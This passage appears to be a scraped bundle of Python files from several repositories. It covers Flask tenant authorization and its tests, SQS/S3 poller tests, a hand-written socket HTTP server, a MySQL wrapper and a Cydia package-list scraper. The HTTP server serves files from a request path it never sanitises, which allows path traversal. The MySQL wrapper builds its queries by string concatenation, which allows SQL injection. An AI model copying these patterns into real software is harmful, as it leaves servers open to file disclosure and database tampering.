return Annex.from_env("FLASK_ANNEX")
class TestS3AnnexMaxContentLength(TestS3Annex):
@pytest.fixture
def annex_base(self, bucket_name):
return Annex("s3", bucket_name, max_content_length=1000)
def assert_default_content_length_range(self, conditions):
assert get_condition(conditions, "content-length-range") == [0, 1000]
def assert_app_config_content_length_range(self, conditions):
assert get_condition(conditions, "content-length-range") == [0, 1000]
``` |
{
"source": "4Catalyzer/flask-resty-tenants",
"score": 2
} |
#### File: flask-resty-tenants/flask_resty_tenants/authorization.py
```python
from uuid import UUID
import flask
from flask_resty import (
ApiError,
AuthorizeModifyMixin,
HasCredentialsAuthorizationBase,
)
from flask_resty.utils import settable_property
# -----------------------------------------------------------------------------
PUBLIC = float("-inf")
READ_ONLY = 0
MEMBER = 1
ADMIN = 2
NOT_ALLOWED = float("inf")
# -----------------------------------------------------------------------------
class TenantAuthorization(
AuthorizeModifyMixin, HasCredentialsAuthorizationBase,
):
read_role = READ_ONLY
modify_role = MEMBER
role_field = "app_metadata"
global_tenant = "*"
tenant_id_type = UUID
tenant_id_field = "tenant_id"
@settable_property
def save_role(self):
return self.modify_role
@settable_property
def create_role(self):
return self.modify_role
@settable_property
def update_role(self):
return self.modify_role
@settable_property
def delete_role(self):
return self.modify_role
def get_request_tenant_id(self):
return flask.request.view_args[self.tenant_id_field]
def get_model_tenant_id(self, model):
return self.get_tenant_id(model)
def get_item_tenant_id(self, item):
return self.get_tenant_id(item)
def get_tenant_id(self, model_or_item):
return getattr(model_or_item, self.tenant_id_field)
def get_data_tenant_id(self, data):
return data[self.tenant_id_field]
def get_role_data(self):
return self.get_credentials_dict_value(self.role_field)
def get_credentials_dict_value(self, key):
try:
value = self.get_request_credentials()[key]
except (TypeError, KeyError):
value = {}
return value if isinstance(value, dict) else {}
def ensure_role(self, role):
return role if isinstance(role, int) else PUBLIC
def get_global_role(self):
role = self.get_role_data().get(self.global_tenant, PUBLIC)
return self.ensure_role(role)
def get_tenant_role(self, tenant_id):
global_role = self.get_global_role()
try:
role = self.ensure_role(self.get_role_data()[str(tenant_id)])
except KeyError:
return global_role
return max(role, global_role)
def get_authorized_tenant_ids(self, required_role):
tenant_ids = []
for tenant_id, tenant_role in self.get_role_data().items():
try:
tenant_id = self.tenant_id_type(tenant_id)
except (TypeError, AttributeError, ValueError):
continue
if not isinstance(tenant_role, int):
continue
if tenant_role < required_role:
continue
tenant_ids.append(tenant_id)
return frozenset(tenant_ids)
def is_authorized(self, tenant_id, required_role):
return self.get_tenant_role(tenant_id) >= required_role
def authorize_request(self):
super().authorize_request()
self.check_request_tenant_id()
def check_request_tenant_id(self):
try:
tenant_id = self.get_request_tenant_id()
except KeyError:
return
if self.get_tenant_role(tenant_id) < self.read_role:
flask.abort(404)
def filter_query(self, query, view):
if self.get_global_role() >= self.read_role:
return query
return query.filter(self.get_filter(view))
def get_filter(self, view):
return self.get_model_tenant_id(view.model).in_(
self.get_authorized_tenant_ids(self.read_role),
)
def authorize_update_item(self, item, data):
self.authorize_update_item_tenant_id(item, data)
super().authorize_update_item(item, data)
def authorize_update_item_tenant_id(self, item, data):
try:
data_tenant_id = self.get_data_tenant_id(data)
except KeyError:
pass
else:
if data_tenant_id != self.get_item_tenant_id(item):
raise ApiError(403, {"code": "invalid_data.tenant"})
def authorize_modify_item(self, item, action):
required_role = self.get_required_role(action)
self.authorize_item_tenant_role(item, required_role)
def get_required_role(self, action):
return getattr(self, f"{action}_role")
def authorize_item_tenant_role(self, item, required_role):
tenant_id = self.get_item_tenant_id(item)
if not self.is_authorized(tenant_id, required_role):
raise ApiError(403, {"code": "invalid_tenant.role"})
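# --- Hedged usage sketch (not part of the original module) ---
# Role resolution: a tenant-specific role and the "*" global role are both
# consulted and the higher one wins. The stubbed credentials below are an
# illustrative assumption; in a real app they come from the request token.
if __name__ == "__main__":
    class _DemoAuthorization(TenantAuthorization):
        tenant_id_type = str
        def get_request_credentials(self):
            return {"app_metadata": {"*": READ_ONLY, "tenant-a": ADMIN}}
    auth = _DemoAuthorization()
    print(auth.get_tenant_role("tenant-a"))        # 2 (ADMIN)
    print(auth.get_tenant_role("tenant-b"))        # 0 (falls back to "*")
    print(auth.is_authorized("tenant-b", MEMBER))  # False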
```
#### File: flask-resty-tenants/tests/test_e2e.py
```python
import json
import flask
import pytest
from flask_resty import Api, AuthenticationBase, GenericModelView
from flask_resty.testing import assert_response
from marshmallow import Schema, fields
from sqlalchemy import Column, Integer, String
from flask_resty_tenants import ADMIN, TenantAuthorization
# -----------------------------------------------------------------------------
TENANT_ID_1 = "tenant_1"
TENANT_ID_2 = "tenant_2"
TENANT_ID_3 = "tenant_3"
USER_CREDENTIALS = {TENANT_ID_1: 0, TENANT_ID_2: 1}
USER_READ_CREDENTIALS = {TENANT_ID_1: 0, TENANT_ID_2: 0}
USER_ADMIN_CREDENTIALS = {TENANT_ID_1: 0, TENANT_ID_2: 2}
DEFAULT_WRITE_CREDENTIALS = {"*": 1}
DEFAULT_READ_CREDENTIALS = {"*": 0}
DEFAULT_ADMIN_CREDENTIALS = {"*": 2}
# -----------------------------------------------------------------------------
@pytest.yield_fixture
def models(db):
class Widget(db.Model):
__tablename__ = "widgets"
id = Column(Integer, primary_key=True)
tenant_id = Column(String)
name = Column(String)
db.create_all()
yield {
"widget": Widget,
}
db.drop_all()
@pytest.fixture
def schemas():
class WidgetSchema(Schema):
id = fields.Integer(as_string=True)
owner_id = fields.String()
name = fields.String()
tenant_id = fields.String()
return {
"widget": WidgetSchema(),
}
@pytest.fixture
def auth():
# dummy authentication based on query params
class Authentication(AuthenticationBase):
def get_request_credentials(self):
return {
"app_metadata": {
k: int(v) for k, v in flask.request.args.items()
}
}
class Authorization(TenantAuthorization):
tenant_id_type = str
class AdminAuthorization(TenantAuthorization):
read_role = ADMIN
modify_role = ADMIN
tenant_id_type = str
return {
"authentication": Authentication(),
"authorization": Authorization(),
"admin_authorization": AdminAuthorization(),
}
@pytest.fixture(autouse=True)
def routes(app, models, schemas, auth):
class WidgetViewBase(GenericModelView):
model = models["widget"]
schema = schemas["widget"]
authentication = auth["authentication"]
authorization = auth["authorization"]
class WidgetListView(WidgetViewBase):
def get(self):
return self.list()
def post(self):
return self.create()
class TenantWidgetListView(WidgetViewBase):
def get(self, tenant_id):
return self.list()
class WidgetView(WidgetViewBase):
def get(self, id):
return self.retrieve(id)
def patch(self, id):
return self.update(id, partial=True)
def delete(self, id):
return self.destroy(id)
class AdminWidgetView(WidgetViewBase):
authorization = auth["admin_authorization"]
def get(self, id):
return self.retrieve(id)
def patch(self, id):
return self.update(id, partial=True)
def delete(self, id):
return self.destroy(id)
api = Api(app)
api.add_resource(
"/widgets", WidgetListView, WidgetView, id_rule="<int:id>"
)
api.add_resource(
"/tenants/<tenant_id>/widgets", TenantWidgetListView,
)
api.add_resource(
"/admin_widgets/<int:id>", AdminWidgetView,
)
@pytest.fixture(autouse=True)
def data(db, models):
db.session.add_all(
(
models["widget"](tenant_id=TENANT_ID_1, name="Foo"),
models["widget"](tenant_id=TENANT_ID_2, name="Bar"),
models["widget"](tenant_id=TENANT_ID_3, name="Baz"),
)
)
db.session.commit()
# -----------------------------------------------------------------------------
def request(client, method, path, data, **kwargs):
return client.open(
path,
method=method,
content_type="application/json",
data=json.dumps({"data": data}),
**kwargs,
)
# -----------------------------------------------------------------------------
def test_list(client):
response = client.get("/widgets", query_string=USER_CREDENTIALS)
assert_response(response, 200, [{"name": "Foo"}, {"name": "Bar"},])
@pytest.mark.parametrize(
"tenant_id, result",
((TENANT_ID_1, 200), (TENANT_ID_2, 200), (TENANT_ID_3, 404),),
)
def test_tenant_list(client, tenant_id, result):
response = client.get(
f"/tenants/{tenant_id}/widgets", query_string=USER_CREDENTIALS,
)
assert_response(response, result)
@pytest.mark.parametrize(
"credentials, result",
(
(USER_READ_CREDENTIALS, 200),
(USER_CREDENTIALS, 200),
(DEFAULT_READ_CREDENTIALS, 200),
(DEFAULT_WRITE_CREDENTIALS, 200),
(None, 404),
),
)
def test_retrieve(client, credentials, result):
response = client.get("/widgets/1", query_string=credentials)
assert_response(response, result)
@pytest.mark.parametrize(
"credentials, result",
(
(USER_READ_CREDENTIALS, 404),
(USER_CREDENTIALS, 404),
(DEFAULT_READ_CREDENTIALS, 404),
(DEFAULT_WRITE_CREDENTIALS, 404),
(None, 404),
(USER_ADMIN_CREDENTIALS, 200),
(DEFAULT_ADMIN_CREDENTIALS, 200),
),
)
def test_admin_retrieve(client, credentials, result):
response = client.get("/admin_widgets/2", query_string=credentials)
assert_response(response, result)
@pytest.mark.parametrize(
"credentials, result",
(
(USER_READ_CREDENTIALS, 403),
(USER_CREDENTIALS, 201),
(DEFAULT_READ_CREDENTIALS, 403),
(DEFAULT_WRITE_CREDENTIALS, 201),
(None, 403),
),
)
def test_create(client, credentials, result):
response = request(
client,
"POST",
"/widgets",
{"name": "Created", "tenant_id": TENANT_ID_2,},
query_string=credentials,
)
assert_response(response, result)
@pytest.mark.parametrize(
"credentials, result",
(
(USER_READ_CREDENTIALS, 403),
(USER_CREDENTIALS, 200),
(DEFAULT_READ_CREDENTIALS, 403),
(DEFAULT_WRITE_CREDENTIALS, 200),
(None, 404),
),
)
def test_update(client, credentials, result):
response = request(
client,
"PATCH",
"/widgets/2",
{"id": "2", "name": "Updated",},
query_string=credentials,
)
assert_response(response, result)
@pytest.mark.parametrize(
"credentials, result",
(
(USER_READ_CREDENTIALS, 404),
(USER_CREDENTIALS, 404),
(DEFAULT_READ_CREDENTIALS, 404),
(DEFAULT_WRITE_CREDENTIALS, 404),
(None, 404),
(USER_ADMIN_CREDENTIALS, 200),
(DEFAULT_ADMIN_CREDENTIALS, 200),
),
)
def test_admin_update(client, credentials, result):
response = request(
client,
"PATCH",
"/admin_widgets/2",
{"id": "2", "name": "Updated",},
query_string=credentials,
)
assert_response(response, result)
@pytest.mark.parametrize(
"credentials, result",
(
(USER_READ_CREDENTIALS, 403),
(USER_CREDENTIALS, 403),
(DEFAULT_READ_CREDENTIALS, 403),
(DEFAULT_WRITE_CREDENTIALS, 403),
(None, 404),
),
)
def test_update_tenant_id(client, credentials, result):
response = request(
client,
"PATCH",
"/widgets/2",
{"id": "2", "tenant_id": TENANT_ID_1,},
query_string=credentials,
)
assert_response(response, result)
@pytest.mark.parametrize(
"credentials, result",
(
(USER_READ_CREDENTIALS, 403),
(USER_CREDENTIALS, 204),
(DEFAULT_READ_CREDENTIALS, 403),
(DEFAULT_WRITE_CREDENTIALS, 204),
(None, 404),
),
)
def test_delete(client, credentials, result):
response = client.delete("/widgets/2", query_string=credentials)
assert_response(response, result)
@pytest.mark.parametrize(
"credentials, result",
(
(USER_READ_CREDENTIALS, 404),
(USER_CREDENTIALS, 404),
(DEFAULT_READ_CREDENTIALS, 404),
(DEFAULT_WRITE_CREDENTIALS, 404),
(None, 404),
(USER_ADMIN_CREDENTIALS, 204),
(DEFAULT_ADMIN_CREDENTIALS, 204),
),
)
def test_admin_delete(client, credentials, result):
response = client.delete("/admin_widgets/2", query_string=credentials)
assert_response(response, result)
``` |
{
"source": "4Catalyzer/fourmat",
"score": 2
} |
#### File: fourmat/test/test_project.py
```python
import os
from pathlib import Path
import pytest
from fourmat.lint import Project, PathContext
TEST_DIR = Path(__file__).parent.resolve()
REPO_ROOT = TEST_DIR.parent.resolve()
@pytest.fixture
def reset():
Project._PROJECT_ROOT = None
os.chdir(REPO_ROOT)
def test_project(reset):
with PathContext(TEST_DIR):
assert str(Project.get_root()) == str(REPO_ROOT)
def test_with_pyproject(reset):
test_project_path = (TEST_DIR / "fixture" / "test_project").resolve()
with PathContext(test_project_path):
assert str(Project.get_root()) == str(test_project_path)
def test_with_fourmat_file(reset):
test_project_path = (
TEST_DIR / "fixture" / "test_project_fourmat"
).resolve()
with PathContext(test_project_path):
assert str(Project.get_root()) == str(test_project_path)
def test_fixture_dir(reset):
fixture = (TEST_DIR / "fixture").resolve()
with PathContext(fixture):
assert str(Project.get_root()) == str(REPO_ROOT)
def test_system_pwd_fallback(reset):
with PathContext("/tmp"):
assert str(Project.get_root()) == str(Path("/tmp").resolve())
``` |
{
"source": "4Catalyzer/tqp",
"score": 2
} |
#### File: tqp/tests/test_topic_queue_poller.py
```python
import json
import time
from threading import Thread
from unittest.mock import Mock
import boto3
from moto import mock_s3, mock_sns, mock_sqs
from moto.server import backends
from tqp.topic_queue_poller import TopicQueuePoller, create_queue
# -----------------------------------------------------------------------------
sqs_backends = backends.get_backend("sqs")
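# moto's backend registry is used below to inspect the mocked SQS queues
# directly (tags, redrive policy) instead of round-tripping through the API.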
@mock_sqs
def test_create_queue():
create_queue("foo", tags={"my": "tag"})
queue = sqs_backends["us-east-1"].queues["foo"]
dlq = sqs_backends["us-east-1"].queues["foo-dead-letter"]
assert queue.tags == {"tqp": "true", "dlq": "false", "my": "tag"}
assert dlq.tags == {"tqp": "true", "dlq": "true", "my": "tag"}
assert queue.redrive_policy == {
"maxReceiveCount": 5,
"deadLetterTargetArn": "arn:aws:sqs:us-east-1:123456789012:foo-dead-letter",
}
@mock_sqs
@mock_sns
def test_tqp():
poller = TopicQueuePoller("foo", prefix="test")
handled_item = None
@poller.handler("my_event")
def handle_my_event(item):
nonlocal handled_item
handled_item = item
t = Thread(target=poller.start, daemon=True)
t.start()
# making sure poller is polling
time.sleep(0.1)
boto3.client("sns").publish(
TopicArn="arn:aws:sns:us-east-1:123456789012:test--my_event",
Message='{"bar": "baz"}',
)
# making sure message is processed
time.sleep(0.05)
assert handled_item == {"bar": "baz"}
@mock_sqs
@mock_s3
def test_s3():
s3 = boto3.client("s3")
s3.create_bucket(Bucket="bucket_foo")
poller = TopicQueuePoller("foo", prefix="test")
handled_item = None
@poller.s3_handler("bucket_foo")
def handle_my_event(item):
nonlocal handled_item
handled_item = item
t = Thread(target=poller.start, daemon=True)
t.start()
# making sure poller is polling
time.sleep(0.5)
poller._handle_message(
Mock(
body=json.dumps(
{
"Records": [
{
"eventSource": "aws:s3",
"eventName": "ObjectCreated:Put",
"s3": {
"bucket": {"name": "bucket_foo"},
"object": {"the": "object"},
},
}
]
}
)
)
)
assert handled_item == {
"bucket_name": "bucket_foo",
"event_name": "ObjectCreated:Put",
"object": {"the": "object"},
}
assert s3.get_bucket_notification_configuration(Bucket="bucket_foo")[
"QueueConfigurations"
] == [
{
"Events": ["s3:ObjectCreated:*"],
"Id": "tqp-subscription",
"QueueArn": "arn:aws:sqs:us-east-1:123456789012:test--foo",
}
]
``` |
{
"source": "4cc3ssflick/4Setter",
"score": 3
} |
#### File: 4cc3ssflick/4Setter/4setter.py
```python
import socket, sys, os, re, time
class asetter(object):
response_status = 200
response_status_set = "OK"
response_header = ""
response_mime = "text/html"
    response_client = ""  # raw data of the last client request, filled in by server()
response_data = ""
lhost = "0.0.0.0"
lport = 40
response_file = ""
doc_path = '/var/www' # os.getcwd()+'/'
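    # Class-level defaults: listen address/port for the server socket and the
    # document root that requested paths are resolved against.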
def header(self):
mime_ext = {
"pdf" : "application/pdf",
"txt" : "text/plain",
"htm" : "text/html",
"exe" : "application/octet-stream",
"zip" : "application/zip",
"doc" : "application/msword",
"xls" : "application/vnd.ms-excel",
"ppt" : "application/vnd.ms-powerpoint",
"gif" : "image/gif",
'php': 'text/plain',
'py': 'text/plain',
'html': 'text/html',
'js': 'application/javascript',
'css': 'text/css',
'jpeg': 'image/jpeg',
'jpg': 'image/jpeg',
'png': 'image/png',
'mp4': 'video/mp4',
'mp3': 'audio/mpeg'
}
index_file = ['index.html', 'index.htm', 'index.php']
        # Pick the MIME type from the requested file's extension, defaulting
        # to text/html when the extension is unknown.
        self.response_mime = mime_ext.get(self.response_file.split('.')[-1], "text/html")
try:
if self.response_file != '/':
try:
if self.doc_path[-1] == '/':
f = open(self.doc_path[:-1] + self.response_file, "rb")
else:
f = open(self.doc_path + self.response_file, "rb")
self.response_status = 200
self.response_status_set = "OK"
self.response_data = f.read()
except IsADirectoryError:
self.response_status = 403
self.response_status_set = "Forbidden"
self.response_data = b"""<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>403 Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
</body>
</html>"""
else:
for index in index_file:
try:
if self.doc_path[-1] == '/':
f = open(self.doc_path+index, 'rb')
else:
f = open(self.doc_path+'/'+index, 'rb')
self.response_status = 200
self.response_status_set = "OK"
self.response_data = f.read()
break
except FileNotFoundError:
pass
except FileNotFoundError:
self.response_status = 404
self.response_status_set = "Not Found"
self.response_data = b"""<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body>
</html>
"""
self.response_header = "HTTP/1.1 %d %s\n" % (self.response_status, self.response_status_set)
self.response_header += "Date: %s\n" % time.strftime("%a, %d %b %Y %H:%M:%S GMT")
self.response_header += "Server: 4Setter Server\n"
self.response_header += "Content-Length: %d\n" % int(len(self.response_data))
self.response_header += "Vary: Accept-Encoding\n"
self.response_header += "Connection: Close\n"
self.response_header += "Content-Type: %s\n\n" % self.response_mime
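    # Accepts connections in a loop: the request line is parsed for the target
    # path, header() builds the status line, headers and body, the request is
    # logged, and the full response is sent back before handling the next client.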
def server(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
s.bind((self.lhost, self.lport))
s.listen(5)
print(f"[{b}*{n}] Server binding started at {g}{self.lhost}{n}:{g}{self.lport}{n}")
while True:
try:
conn, addr = s.accept()
except KeyboardInterrupt:
print(f"[{r}!{n}] Shutting down the server... ", end='')
s.close()
print(f"{g}OK{n}")
sys.exit(0)
self.response_client = conn.recv(1024).decode()
self.response_file = re.split(' ', self.response_client.splitlines()[0])[1].replace("%20", " ")
self.header()
print(f'{g}%s{n} - - [{b}%s{n}] \"%s\" %d -' % (addr[0], time.strftime("%d/%m/%Y %H:%M:%S"), self.response_client.splitlines()[0], self.response_status))
conn.sendall(self.response_header.encode() + self.response_data)
if __name__ == '__main__':
r = '\033[031m'
g = '\033[032m'
b = '\033[036m'
k = '\033[030m'
n = '\033[00m'
banner = """
{r}____ {g}____ __ {b}__{n}
{r}/ / /{g}/ __/__ / /_{b}/ /____ ____{n}
{r}/_ _/{g}\ \/ -_) __/{b} __/ -_) __/{n}
{r}/_/{g}/___/\__/\__/{b}\__/\__/_/{n}
{r}MSF{n}{b}: http://www.{n}mmsecurity.n{g}et/forum/member.php?action=register&referrer=9450{n}
{r}v1.0{n}
""".format(r=r, g=g, b=b, n=n)
print(banner)
asetter().server()
``` |
{
"source": "4cd87a/attestation-deplacement-derogatoire-telegram-bot",
"score": 3
} |
#### File: 4cd87a/attestation-deplacement-derogatoire-telegram-bot/sql.py
```python
import os.path, random, time
from datetime import datetime
import mysql.connector
import config
class SQLighter:
def __init__(self, telid=None, idd=None, logger=None):
self.logger = logger
self.connection = mysql.connector.connect(
host=config.mysql_host,
port=config.mysql_port,
user=config.mysql_user,
passwd=config.mysql_passwd,
database=config.mysql_database
)
self.cursor = self.connection.cursor()
self.idd = None
self.user = self.user_get(telid=telid,idd=idd)
self.idd = None if self.user is None else self.user['id']
def _print(self, txt, type="INFO"):
if self.logger == None:
#return
print("[{}] : {}".format(type, txt))
else:
type = type.lower()
if type == "info" or type == 'i':
self.logger.info(txt)
if type == "warning" or type == 'w':
self.logger.warning(txt)
if type == "error" or type == 'e':
self.logger.error(txt)
def close(self):
self.cursor.close()
self.connection.close()
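    # Generic low-level helpers. Queries are built by plain string
    # concatenation, e.g. (illustrative only):
    #   getFromTable('users', ['id', 'telid'], "WHERE `id`=1")
    #   -> SELECT `id`,`telid` FROM `users` WHERE `id`=1
    # Nothing is parameterised, so these helpers must only see trusted input.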
def getFromTable(self, table, field, like=""):
field_text = ""
for f in field:
field_text += "`" + str(f) + "`,"
field_text = field_text[0:-1]
table = '`' + str(table) + '`'
# with self.connection:
self._print("SELECT " + field_text + " FROM " + str(table) + " " + like, 'i')
self.cursor.execute("SELECT " + field_text + " FROM " + str(table) + " " + like)
res = self.cursor.fetchall()
self.connection.commit()
if len(res):
ret = []
for j in range(len(res)):
dic = {}
for i, f in enumerate(field):
dic.update({f: res[j][i]})
ret.append(dic)
return ret
else:
return []
def addToTable(self, table, field, whattoad):
        if len(field) != len(whattoad): raise ValueError("field and whattoad aren't the same length in addToTable")
field_text = "("
add_text = "("
for i in range(len(field)):
# print(field[i])
# print(whattoad[i])
field_text += "`" + str(field[i]) + "`,"
# if type(whattoad[i]) == int or type(whattoad[i]) == float: add_text += "" + str(whattoad[i]) + ","
add_text += "'" + str(whattoad[i]) + "',"
field_text = field_text[0:-1] + ")"
add_text = add_text[0:-1] + ")"
table = '`' + str(table) + '`'
# with self.connection:
self._print("INSERT INTO " + table + field_text + " VALUES " + add_text, 'i')
self.cursor.execute("INSERT INTO " + table + field_text + " VALUES " + add_text)
self.cursor.execute("SELECT max(id) from {}".format(table))
res = self.cursor.fetchall()
self.connection.commit()
return res[0][0]
def changeTable(self, table, field, whattoad, like):
        if len(field) != len(whattoad): raise ValueError("field and whattoad aren't the same length in changeTable")
if len(field) == 0: return True
field_text = ""
for i in range(len(field)):
field_text += "`" + str(field[i]) + "`" + "=" + "'" + str(whattoad[i]) + "',"
field_text = field_text[0:-1]
table = '`' + str(table) + '`'
# with self.connection:
self._print("UPDATE " + table + " SET " + field_text + " " + like, 'i')
self.cursor.execute("UPDATE " + table + " SET " + field_text + " " + like)
self.connection.commit()
return True
def deleteFromTable(self, table, like):
table = '`' + str(table) + '`'
# with self.connection:
self._print("DELETE FROM " + table + " " + like, 'w')
self.cursor.execute("DELETE FROM " + table + " " + like)
self.connection.commit()
return True
def user_add(self,telid, telusername, mode=0):
return self.addToTable('users',
['telid', 'telusername', 'mode'],
[telid, telusername, mode])
def user_add_all(self,telid, telusername, name, birthday,placeofbirth,adress,place,mode=0):
return self.addToTable('users',
['telid', 'telusername', 'name', 'birthday','placeofbirth','adress','place','mode','admin'],
[telid, telusername, name, birthday, placeofbirth, adress, place, mode,0])
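    # Lookup precedence for the user helpers below: an explicit `idd`, then an
    # explicit `telid`, then the id cached on the instance (self.idd).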
def user_get(self,idd=None, telid=None,all=False):
like = None
if idd and type(idd)==int:
like = "WHERE `id`={}".format(idd)
if telid and type(telid)==int:
like = "WHERE `telid`={}".format(telid)
if like is None and self.idd is not None:
like = "WHERE `id`={}".format(self.idd)
if like is None: return None
        if all:
            res = self.getFromTable('users', ['id', 'telid', 'telusername', 'name', 'birthday', 'placeofbirth', 'adress', 'place', 'mode', 'admin'], like)
        else:
            res = self.getFromTable('users', ['id', 'telid', 'name', 'birthday', 'placeofbirth', 'adress', 'place', 'mode', 'admin'], like)
if len(res): return res[0]
return None
def user_update(self,idd=None, telid=None, telusername=None, name=None, birthday=None,placeofbirth=None,adress=None,place=None,mode=None):
like = None
if idd and type(idd) == int:
like = "WHERE `id`={}".format(idd)
if telid and type(telid) == int:
like = "WHERE `telid`={}".format(telid)
if like is None and self.idd is not None:
like = "WHERE `id`={}".format(self.idd)
if like is None: return None
fields = []
values = []
if telusername:
fields.append('telusername')
values.append(telusername)
if name:
fields.append('name')
values.append(name)
if birthday:
fields.append('birthday')
values.append(birthday)
if placeofbirth:
fields.append('placeofbirth')
values.append(placeofbirth)
if adress:
fields.append('adress')
values.append(adress)
if place:
fields.append('place')
values.append(place)
if mode is not None and type(mode)==int:
fields.append('mode')
values.append(mode)
return self.changeTable('users',fields,values,like)
def user_set_mode(self,idd=None, telid=None,mode=0):
return self.user_update(idd=idd,telid=telid,mode=mode)
def user_all(self):
res = self.getFromTable('users',['id','telid'])
if len(res): return res
return None
def live_update_list(self,delta=1200,active_duration=10800): #1200
timenow = time.time()
like = "WHERE `live_update_start`>'{}' AND `live_update_last`<'{}' ORDER BY `live_update_last`".format(round(timenow - active_duration),round(timenow - delta))
return self.getFromTable('users', ['id', 'telid', 'live_update_start', 'live_update_last', 'live_update_mode'], like)
def live_update_update(self,idd=None, telid=None,last=None,start=None,mode=None):
like = None
if idd and type(idd) == int:
like = "WHERE `id`={}".format(idd)
if telid and type(telid) == int:
like = "WHERE `telid`={}".format(telid)
if like is None and self.idd is not None:
like = "WHERE `id`={}".format(self.idd)
if like is None: return None
fields = ['live_update_last']
if last==None:
last = round(time.time())
values = [last]
if start==-1:
fields.append('live_update_start')
values.append(round(time.time()))
elif start != None:
fields.append('live_update_start')
values.append(start)
if mode!=None:
fields.append('live_update_mode')
values.append(mode)
return self.changeTable('users', fields, values, like)
def log_add(self,idd=None, typ=0, message=''):
message = message.replace('"','').replace("'","")
like = idd or self.idd
if like is None: return None
return self.addToTable('logs',
['id_user', 'typ', 'message'],
[like, typ, message])
``` |
{
"source": "4ch12dy/cydiarepor",
"score": 2
} |
#### File: 4ch12dy/cydiarepor/cydiarepor.py
```python
import requests
#import wget
import sys
import shlex
import optparse
import gzip
import StringIO
import bz2
import urlparse
def get_default_cydia_repo_array():
default_repos = []
# BigBoss of coolstar
default_repos.append("https://repounclutter.coolstar.org")
default_repos.append("https://repo.chimera.sh")
default_repos.append("https://build.frida.re")
default_repos.append("https://coolstar.org/publicrepo")
default_repos.append("https://apt.bingner.com")
default_repos.append("https://xia0z.github.io")
return default_repos
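# Legacy repos (old BigBoss / apt.bingner.com layouts) do not serve Packages at
# the repo root; this helper maps them to their full Packages.bz2 URL and
# compression type, and returns None for any other repo.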
def handle_old_cydia_repo(url):
parse_result = urlparse.urlparse(url)
scheme = '{uri.scheme}'.format(uri=parse_result)
url = url[len(scheme):]
old_BigBoss_repo = "://apt.thebigboss.org/repofiles/cydia"
old_bingner_repo = "://apt.bingner.com"
repo_package_url = ""
zip_type = ""
ret = []
if url == old_BigBoss_repo:
repo_package_url = scheme+old_BigBoss_repo + "/dists/stable/main/binary-iphoneos-arm/Packages.bz2"
zip_type = "bz2"
ret.append(repo_package_url)
ret.append(zip_type)
elif url == old_bingner_repo:
repo_package_url = scheme+old_bingner_repo + "/dists/ios/1443.00/"+"main/binary-iphoneos-arm/Packages.bz2"
zip_type = "bz2"
ret.append(repo_package_url)
ret.append(zip_type)
else:
ret = None
return ret
def is_url_reachable(url):
r = requests.get(url, allow_redirects = False)
status = r.status_code
if status == 200:
return True
return False
def unzip_data_to_string(data, unzip_type):
unzip_string = ""
if unzip_type == "gz":
compressedstream = StringIO.StringIO(data)
gziper = gzip.GzipFile(fileobj=compressedstream)
unzip_string = gziper.read()
elif unzip_type == "bz2":
unzip_string = bz2.decompress(data)
else:
        print("[-] unknown zip type!")
exit(1)
return unzip_string
def http_get(url):
r = requests.get(url, stream=True)
return r
def get_debs_from_cydiarepoURL(repoURL):
# Package: com.archry.joker
# Version: 1.0.30-1+debug
# Architecture: iphoneos-arm
# Installed-Size: 588
# Depends: mobilesubstrate
# Filename: ./debs/com.archry.joker.deb.deb
# Size: 117922
# MD5sum: c5d30e1b10177190ee56eecf5dbb5cfe
# SHA1: 377d5c59926083b2acdd95028abe24edfeba6141
# SHA256: fcb97af34c56d4a2bd67540df0427cb0cbd9b68e4c4e78f555265c3db1e2b67e
# Section: Hack
# Description: Archery king hack winde , zoom and better Aiming
# Author: @Kgfunn
# Depiction: https://joker2gun.github.io/depictions/?p=com.archry.joker
# Name: Archery King Hack
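    # The repo is probed for Packages, then Packages.bz2, then Packages.gz.
    # The (possibly decompressed) file is split into stanzas on blank lines and
    # each "Key: value" line is split on ':'; only the fields listed in
    # need_item_array are kept for every deb.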
cydiarepo_Packages_URL = repoURL + '/Packages'
cydiarepo_Packages_bz2_URL = repoURL + '/Packages.bz2'
cydiarepo_Packages_gz_URL = repoURL + '/Packages.gz'
if handle_old_cydia_repo(repoURL):
ret = handle_old_cydia_repo(repoURL)
zip_type = ret[1]
if zip_type == "gz":
cydiarepo_Packages_gz_URL = ret[0]
elif zip_type == "bz2":
cydiarepo_Packages_bz2_URL = ret[0]
else:
print("[-] unknown old cydia repo zip type")
exit(1)
cydiarepo_reachable_URL = ''
is_need_unzip = False
unzip_type = ''
if is_url_reachable(cydiarepo_Packages_URL):
cydiarepo_reachable_URL = cydiarepo_Packages_URL
elif is_url_reachable(cydiarepo_Packages_bz2_URL):
cydiarepo_reachable_URL = cydiarepo_Packages_bz2_URL
is_need_unzip = True
unzip_type = "bz2"
elif is_url_reachable(cydiarepo_Packages_gz_URL):
cydiarepo_reachable_URL = cydiarepo_Packages_gz_URL
is_need_unzip = True
unzip_type = "gz"
else:
        print("[-] {}: no Packages, Packages.bz2 or Packages.gz file found, check the repo URL!".format(repoURL))
exit(1)
r = requests.get(cydiarepo_reachable_URL)
raw_packages_data = r.content
raw_packages_string = ""
if is_need_unzip:
raw_packages_string = unzip_data_to_string(raw_packages_data, unzip_type)
else:
raw_packages_string = raw_packages_data
raw_packages_list = raw_packages_string.split("\n\n")
repo_info = {"url":repoURL}
all_deb = []
for raw_package_string in raw_packages_list:
raw_deb_list = raw_package_string.split("\n")
cur_deb = {}
for raw_deb_str in raw_deb_list:
deb_item = raw_deb_str.split(":")
if len(deb_item) != 2:
continue
deb_item_k = deb_item[0].strip()
deb_item_v = deb_item[1].strip()
need_item_array = ["Package", "Version", "Filename", "Name", "Description"]
if deb_item_k in need_item_array:
cur_deb[deb_item_k] = deb_item_v
for k in need_item_array:
if not cur_deb.has_key(k):
cur_deb[k] = ""
cur_deb["repo"]=repo_info
if cur_deb:
all_deb.append(cur_deb)
return all_deb
def get_debs_in_default_cydia_repo():
    default_repo_urls = get_default_cydia_repo_array()
    default_debs = []
    for url in default_repo_urls:
        debs = get_debs_from_cydiarepoURL(url)
